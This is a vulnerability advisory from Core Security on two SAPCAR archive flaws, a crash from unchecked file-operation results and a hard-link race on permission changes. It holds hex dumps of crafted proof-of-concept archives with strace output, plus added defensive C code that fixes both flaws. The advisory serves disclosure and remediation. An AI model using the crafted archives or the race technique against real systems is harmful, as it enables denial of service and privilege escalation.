**CVSS2:** AV:L/AC:M/Au:N/C:P/I:P/A:P

- Attack Vector: LOCAL
- Attack Complexity: MEDIUM
- Authentication: NONE
- Confidentiality Impact: PARTIAL
- Integrity Impact: PARTIAL
- Availability Impact: PARTIAL

**CVSS3:** CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

- Attack Vector: LOCAL
- Attack Complexity: LOW
- Privileges Required: LOW
- User Interaction: NONE
- Scope: UNCHANGED
- Confidentiality Impact: NONE
- Integrity Impact: NONE
- Availability Impact: HIGH

**EPSS Percentile:** 70.7%
**Title:** SAP CAR Multiple Vulnerabilities
**Advisory ID:** CORE-2016-0006
**Advisory URL:** <https://www.coresecurity.com/core-labs/advisories/sap-car-multiple-vulnerabilities>
**Date published:** 2016-08-10
**Date of last update:** 2016-08-10
**Vendors contacted:** SAP
**Release mode:** Coordinated release
**Class:** Unchecked Return Value [CWE-252], TOCTOU Race Condition [CWE-367]
**Impact:** Denial of service, Security bypass
**Remotely Exploitable:** No
**Locally Exploitable:** Yes
**CVE Name:** CVE-2016-5845, CVE-2016-5847
SAP [1] distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files that could lead to local denial of service conditions or privilege escalation.
Other products and versions might be affected, but they were not tested.
SAP published the following Security Notes:
This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
SAP distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files that could lead to denial of service conditions or escalation of privileges.
The code that handles the extraction of archive files is prone to privilege escalation and denial of service vulnerabilities.
[CVE-2016-5845] Denial of service vulnerability due to the SAPCAR program not checking the return value of file operations when extracting files. This might result in the program crashing when trying to extract files from a specially crafted archive file that contains invalid file names for the target platform. Of special interest are applications or solutions that make use of SAPCAR in an automated way.
The following is a proof of concept to demonstrate the vulnerability:
```
$ xxd SAPCAR_crash.SAR
0000000: 4341 5220 322e 3031 4452 0081 0000 0f00  CAR 2.01DR......
0000010: 0000 0000 0000 0000 0000 d4f8 e555 0000  .............U..
0000020: 0000 0000 0000 0000 1000 696e 7075 742d  ..........input-
0000030: 6469 722f 696e 7090 7400 4544 1a00 0000  dir/inp.t.ED....
0000040: 0f00 0000 121f 9d02 7bc1 23b9 a90a 25a9  ........{.#...%.
0000050: 1525 0a69 9939 a95c 0000 857f b95a       .%.i.9.\.....Z

$ ./SAPCAR -dvf SAPCAR_crash.SAR
SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01)
d input-dir/inp#t
SAPCAR: checksum error in input-dir/inp#t (error 12). No such file or director

$ ./SAPCAR -xvf SAPCAR_crash.SAR
SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01)
x input-dir/inp#t
Segmentation fault
```
[CVE-2016-5847] Race condition vulnerability due to the way the SAPCAR program changes the permissions of extracted files. If a malicious local user has access to a directory where a user is extracting files using SAPCAR, the attacker might use this vulnerability to change the permissions of arbitrary files belonging to the user.
The SAPCAR program writes the file being extracted and, after closing it, changes the permissions to the ones set in the archive file. There is a time gap between the creation of the file and the change of the permissions. During this time frame, a malicious local user can replace the extracted file with a hard link to a file belonging to another user, resulting in the SAPCAR program changing the permissions on the hard-linked file to be the same as those of the compressed file.
The following is a proof of concept to demonstrate the vulnerability:
```
$ xxd SAPCAR_race_condition.SAR
0000000: 4341 5220 322e 3031 5247 b481 0000 2b00  CAR 2.01RG....+.
0000010: 0000 0000 0000 0000 0000 d023 5e56 0000  ...........#^V..
0000020: 0000 0000 0000 0000 1000 7465 7374 5f73  ..........test_s
0000030: 7472 696e 672e 7478 7400 4544 3500 0000  tring.txt.ED5...
0000040: 2b00 0000 121f 9d02 7b21 19a9 0a85 a599  +.......{!......
0000050: c9d9 0a49 45f9 e579 0a69 f915 0a59 a5b9  ...IE..y.i...Y..
0000060: 05c5 0af9 65a9 450a 2540 e99c c4aa 4a85  ....e.E.%@....J.
0000070: 94fc 7400 0008 08c6 b9                   ..t......

$ ./SAPCAR -tvf SAPCAR_race_condition.SAR
SAPCAR: processing archive SAPCAR_race_condition.SAR (version 2.01)
-rw-rw-r--          43    01 Dec 2015 19:48 test_string.txt

$ strace ./SAPCAR -xvf SAPCAR_race_condition.SAR
execve("./SAPCAR", ["./SAPCAR", "-xvf", "SAPCAR_race_condition.SAR"], [/* 76 vars */]) = 0
[..]
open("test_string.txt", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
mmap(NULL, 323584, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c4704000
fstat(4, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c475c000
write(4, "The quick brown fox jumps over t"..., 43) = 43
close(4) = 0
munmap(0x7f98c475c000, 4096) = 0
utime("test_string.txt", [2015/12/01-19:48:48, 2015/12/01-19:48:48]) = 0
chmod("test_string.txt", 0664) = 0
[..]
```
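Both defects above come down to how a member is written to disk: CVE-2016-5845 is an unchecked return value after an invalid member name makes a file operation fail, and CVE-2016-5847 is the `close()`-then-`chmod(path)` sequence visible in the strace, which leaves a window in which the path can be re-pointed at another file. The following is an added example, not code from the advisory or from SAPCAR, showing how an extractor would close both gaps in C. The function names (`entry_name_is_valid`, `write_entry_safe`, `demo_extract`), the status codes, the deliberately strict name policy and the temporary-directory self-check are all constructed for this example; the fix they illustrate is to validate names first, check every file call's result, and apply the archive mode with `fchmod()` on the descriptor of the inode the extractor itself created.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Status codes for the hypothetical extraction routine below (constructed for this example). */
enum extract_status { EXTRACT_OK = 0, EXTRACT_BAD_NAME = 1, EXTRACT_IO_ERROR = 2 };

/* CVE-2016-5845 side: validate a member name before any file operation is attempted.
 * This example's policy is deliberately strict: no empty or absolute names, no ".."
 * components, no control or non-ASCII bytes (the crash PoC above embeds 0x90 in
 * "input-dir/inp\x90t"). A real extractor would apply the target platform's own rules. */
int entry_name_is_valid(const char *name)
{
    if (name == NULL || name[0] == '\0' || name[0] == '/')
        return 0;
    for (const unsigned char *p = (const unsigned char *)name; *p != '\0'; p++)
        if (*p < 0x20 || *p > 0x7e)
            return 0;
    for (const char *seg = name;;) {             /* walk the path components */
        const char *slash = strchr(seg, '/');
        size_t n = slash ? (size_t)(slash - seg) : strlen(seg);
        if (n == 2 && seg[0] == '.' && seg[1] == '.')
            return 0;
        if (slash == NULL)
            return 1;
        seg = slash + 1;
    }
}

/* CVE-2016-5847 side: create the member relative to dirfd and apply its mode on the open
 * descriptor, so the permission change can only ever reach the inode this call created.
 * Every file operation's return value is checked, so a failing name cannot crash the caller. */
int write_entry_safe(int dirfd, const char *name, const char *data, size_t len, mode_t mode)
{
    if (!entry_name_is_valid(name))
        return EXTRACT_BAD_NAME;
    /* O_EXCL: refuse a path that already exists (including a link planted there);
     * O_NOFOLLOW: never follow a symlink at the final component. */
    int fd = openat(dirfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, mode & 0777);
    if (fd < 0)
        return EXTRACT_IO_ERROR;
    for (size_t off = 0; off < len;) {           /* write() may be short; loop until done */
        ssize_t w = write(fd, data + off, len - off);
        if (w < 0) {
            if (errno == EINTR)
                continue;
            close(fd);
            return EXTRACT_IO_ERROR;
        }
        off += (size_t)w;
    }
    /* fchmod() on the descriptor replaces the close()-then-chmod(path) sequence from the
     * strace above: there is no window in which the path can name a different file. */
    if (fchmod(fd, mode & 0777) != 0) {
        close(fd);
        return EXTRACT_IO_ERROR;
    }
    return close(fd) == 0 ? EXTRACT_OK : EXTRACT_IO_ERROR;
}

/* Self-check: extract one constructed member into a fresh temporary directory, confirm its
 * mode and size, and confirm that a second extraction of the same name is refused. */
int demo_extract(void)
{
    char dir[] = "/tmp/sapcar-example-XXXXXX";   /* template for mkdtemp(), constructed */
    const char data[] = "The quick brown fox jumps over the lazy dog\n";
    size_t len = sizeof data - 1;
    struct stat st;
    if (mkdtemp(dir) == NULL)
        return EXTRACT_IO_ERROR;
    int dirfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dirfd < 0) {
        rmdir(dir);
        return EXTRACT_IO_ERROR;
    }
    int rc = write_entry_safe(dirfd, "test_string.txt", data, len, 0664);
    if (rc == EXTRACT_OK &&
        (fstatat(dirfd, "test_string.txt", &st, AT_SYMLINK_NOFOLLOW) != 0 ||
         (st.st_mode & 0777) != 0664 || (size_t)st.st_size != len))
        rc = EXTRACT_IO_ERROR;
    if (rc == EXTRACT_OK &&
        write_entry_safe(dirfd, "test_string.txt", data, len, 0664) != EXTRACT_IO_ERROR)
        rc = EXTRACT_IO_ERROR;                   /* O_EXCL must reject the existing path */
    unlinkat(dirfd, "test_string.txt", 0);
    close(dirfd);
    rmdir(dir);
    return rc;
}

int main(void)
{
    printf("valid name: %d, PoC name: %d\n", entry_name_is_valid("test_string.txt"),
           entry_name_is_valid("input-dir/inp\x90" "t"));
    printf("demo_extract: %d (0 = EXTRACT_OK)\n", demo_extract());
    return 0;
}
```

The mode passed to `openat()` is still subject to the umask, which is why `fchmod()` is applied afterwards to match the archive entry exactly; because it operates on the descriptor rather than the path, a hard link or symlink swapped in after creation is simply never touched. Rejecting an existing path with `O_EXCL` is a policy choice for this example; an extractor that must overwrite would instead unlink first and still create with `O_EXCL` so that it only ever writes through an inode it made itself.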
[1] <http://go.sap.com/>.
CoreLabs, the research center of Core Security, A Fortra Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright © 2016 Core Security and © 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of the Core Security advisories team.